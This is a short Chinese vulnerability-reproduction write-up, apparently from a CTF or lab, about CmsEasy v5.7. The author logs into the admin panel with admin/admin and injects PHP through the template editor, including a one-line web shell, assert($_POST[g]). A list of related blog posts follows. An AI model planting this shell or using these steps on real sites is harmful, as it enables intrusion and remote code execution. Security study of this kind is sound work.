【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

复制代码
1111111111";}<?php phpinfo()?>

payload2:

复制代码
11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
浩浩测试一下11 分钟前
网络安全中信息收集需要收集哪些信息了?汇总
安全·web安全·网络安全·oracle·sqlite·系统安全·可信计算技术
0x40822 分钟前
数据结构--线性表&顺序表示(上)
数据结构·笔记
sszdlbw24 分钟前
BUUCTF-web刷题篇(19)
web安全·web·安全漏洞·buuctf
中云时代-防御可测试-小余25 分钟前
阿里云CDN应对DDoS攻击策略
运维·安全·阿里云·云计算·负载均衡·ddos
Tanner_SL28 分钟前
Linux笔记之Ubuntu系统设置自动登录tty1界面
linux·笔记·ubuntu
愚润求学38 分钟前
【C++】模板进阶
c语言·开发语言·c++·笔记·模板
CZIDC1 小时前
Linux系统安全-开发中注意哪些操作系统安全
linux·安全·系统安全
东方芷兰1 小时前
JavaWeb 课堂笔记 —— 03 Vue
java·前端·javascript·vue.js·笔记
一个天蝎座 白勺 程序猿1 小时前
大数据(7.3)Kafka量子安全加密实践指南:构建抗量子计算攻击的消息系统
大数据·安全·kafka·量子计算
Bruce_Liuxiaowei2 小时前
网络安全应急响应-启动项和任务计划排查
安全·web安全